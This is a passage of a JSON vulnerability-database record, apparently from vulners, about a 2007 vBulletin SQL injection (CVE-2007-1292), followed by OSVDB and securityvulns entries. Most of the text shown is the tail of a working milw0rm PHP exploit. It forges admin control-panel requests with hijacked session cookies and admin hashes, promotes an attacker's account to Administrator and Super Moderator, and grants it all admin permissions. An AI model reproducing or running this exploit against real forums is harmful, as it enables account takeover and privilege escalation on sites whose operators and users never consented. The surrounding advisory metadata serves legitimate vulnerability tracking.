=\"do=update\";\n$data.=\"&adminhash=$adminhash\";\n$data.=\"&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D\".$my_uid;\n$data.=\"&user%5Busername%5D=$user\";\n$data.=\"&password=\";\n$data.=\"&user%5Bemail%5D=$my_email\";\n$data.=\"&user%5Blanguageid%5D=0\";\n$data.=\"&user%5Busertitle%5D=Admin\";\n$data.=\"&user%5Bcustomtitle%5D=0\";\n$data.=\"&user%5Bhomepage%5D=\";\n$data.=\"&user%5Bbirthday%5D%5Bmonth%5D=0\";\n$data.=\"&user%5Bbirthday%5D%5Bday%5D=\";\n$data.=\"&user%5Bbirthday%5D%5Byear%5D=\";\n$data.=\"&user%5Bshowbirthday%5D=0\";\n$data.=\"&user%5Bsignature%5D=\";\n$data.=\"&user%5Bicq%5D=\";\n$data.=\"&user%5Baim%5D=\";\n$data.=\"&user%5Byahoo%5D=\";\n$data.=\"&user%5Bmsn%5D=\";\n$data.=\"&user%5Bskype%5D=\";\n$data.=\"&options%5Bcoppauser%5D=0\";\n$data.=\"&user%5Bparentemail%5D=$my_email\";\n$data.=\"&user%5Breferrerid%5D=\";\n$data.=\"&user%5Bipaddress%5D=\";\n$data.=\"&user%5Bposts%5D=0\";\n$data.=\"&userfield%5Bfield1%5D=\";\n$data.=\"&userfield%5Bfield2%5D=\";\n$data.=\"&userfield%5Bfield3%5D=\";\n$data.=\"&userfield%5Bfield4%5D=\";\n$data.=\"&user%5Busergroupid%5D=6\";//primary usergroup, 6=Administrators\n$data.=\"&user%5Bdisplaygroupid%5D=-1\";\n$data.=\"&user%5Bmembergroupids%5D%5B%5D=5\";//secondary usergroup, 5=Super Moderators\n$data.=\"&options%5Bshowreputation%5D=1\";\n$data.=\"&user%5Breputation%5D=10\";\n$data.=\"&user%5Bwarnings%5D=0\";\n$data.=\"&user%5Binfractions%5D=0\";\n$data.=\"&user%5Bipoints%5D=0\";\n$data.=\"&options%5Badminemail%5D=1\";\n$data.=\"&options%5Bshowemail%5D=0\";\n$data.=\"&options%5Binvisible%5D=0\";\n$data.=\"&options%5Bshowvcard%5D=0\";\n$data.=\"&options%5Breceivepm%5D=1\";\n$data.=\"&options%5Breceivepmbuddies%5D=0\";\n$data.=\"&options%5Bemailonpm%5D=0\";\n$data.=\"&user%5Bpmpopup%5D=0\";\n$data.=\"&options%5Bshowsignatures%5D=1\";\n$data.=\"&options%5Bshowavatars%5D=1\";\n$data.=\"&options%5Bshowimages%5D=1\";\n$data.=\"&user%5Bautosubscribe%5D=-1\";\n$data.=\"&user%5Bthreadedmode%5D=0\";\n$data.=\"&user%5Bshowvbcode%5D=1\";\n$data.=\"&user%5Bstyleid%5D=0\";\n$data.=\"&adminoptions%5Badminavatar%5D=0\";\n$data.=\"&adminoptions%5Badminprofilepic%5D=0\";\n$data.=\"&user%5Btimezoneoffset%5D=0\";\n$data.=\"&options%5Bdstauto%5D=1\";\n$data.=\"&options%5Bdstonoff%5D=0\";\n$data.=\"&user%5Bdaysprune%5D=-1\";\n$data.=\"&user%5Bjoindate%5D%5Bmonth%5D=2\";\n$data.=\"&user%5Bjoindate%5D%5Bday%5D=26\";\n$data.=\"&user%5Bjoindate%5D%5Byear%5D=2007\";\n$data.=\"&user%5Bjoindate%5D%5Bhour%5D=14\";\n$data.=\"&user%5Bjoindate%5D%5Bminute%5D=39\";\n$data.=\"&user%5Blastactivity%5D%5Bmonth%5D=2\";\n$data.=\"&user%5Blastactivity%5D%5Bday%5D=26\";\n$data.=\"&user%5Blastactivity%5D%5Byear%5D=2007\";\n$data.=\"&user%5Blastactivity%5D%5Bhour%5D=14\";\n$data.=\"&user%5Blastactivity%5D%5Bminute%5D=58\";\n$data.=\"&user%5Blastpost%5D%5Bmonth%5D=0\";\n$data.=\"&user%5Blastpost%5D%5Bday%5D=\";\n$data.=\"&user%5Blastpost%5D%5Byear%5D=\";\n$data.=\"&user%5Blastpost%5D%5Bhour%5D=\";\n$data.=\"&user%5Blastpost%5D%5Bminute%5D=\";\n$data.=\"&userid=\".$mu_uid;\n$data.=\"&ousergroupid=\";\n$data.=\"&odisplaygroupid=0\";\n$data.=\"&userfield%5Bfield1_set%5D=1\";\n$data.=\"&userfield%5Bfield2_set%5D=1\";\n$data.=\"&userfield%5Bfield3_set%5D=1\";\n$data.=\"&userfield%5Bfield4_set%5D=1\";\n$packet =\"POST \".$p.\"admincp/user.php?do=edit&u=$my_uid HTTP/1.0\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n$packet.=\"Accept-Language: en\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Pragma: no-cache\\r\\n\";\n$packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; \".$cookie_prefix.\"userid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nsleep(1);\n\n//now give full rights to the new Administrator\n$data =\"do=update\";\n$data.=\"&adminhash=\".$adminhash;\n$data.=\"&adminpermissions%5Bcanadminsettings%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminstyles%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminlanguages%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminforums%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminthreads%5D=1\";\n$data.=\"&adminpermissions%5Bcanadmincalendars%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminusers%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminpermissions%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminfaq%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminimages%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminbbcodes%5D=1\";\n$data.=\"&adminpermissions%5Bcanadmincron%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminmaintain%5D=1\";\n$data.=\"&adminpermissions%5Bcanadminplugins%5D=1\";\n$data.=\"&cssprefs=\";\n$data.=\"&dismissednews=\";\n$data.=\"&userid=\".$my_uid;\n$data.=\"&oldpermissions=98300\";\n$data.=\"&adminpermissions%5Bcanadminupgrade%5D=0\";\n$packet =\"POST \".$p.\"admincp/adminpermissions.php?do=update HTTP/1.0\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"profile.php\\r\\n\";\n$packet.=\"Accept-Language: en\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Pragma: no-cache\\r\\n\";\n$packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; \".$cookie_prefix.\"userid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\necho \"\\nnow go to http://\".$host.$path.\"admincp/index.php and login to the control panel...\";\n?>\n\n# milw0rm.com [2007-02-28]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3387/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.vbulletin.com/forum/showthread.php?postid=1314422\n[Secunia Advisory ID:24341](https://secuniaresearch.flexerasoftware.com/advisories/24341/)\nISS X-Force ID: 32746\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3387\n[CVE-2007-1292](https://vulners.com/cve/CVE-2007-1292)\nBugtraq ID: 22780\n", "modified": "2007-02-28T09:33:52", "published": "2007-02-28T09:33:52", "href": "https://vulners.com/osvdb/OSVDB:33835", "id": "OSVDB:33835", "title": "vBulletin inlinemod.php postids Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7370", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7370", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
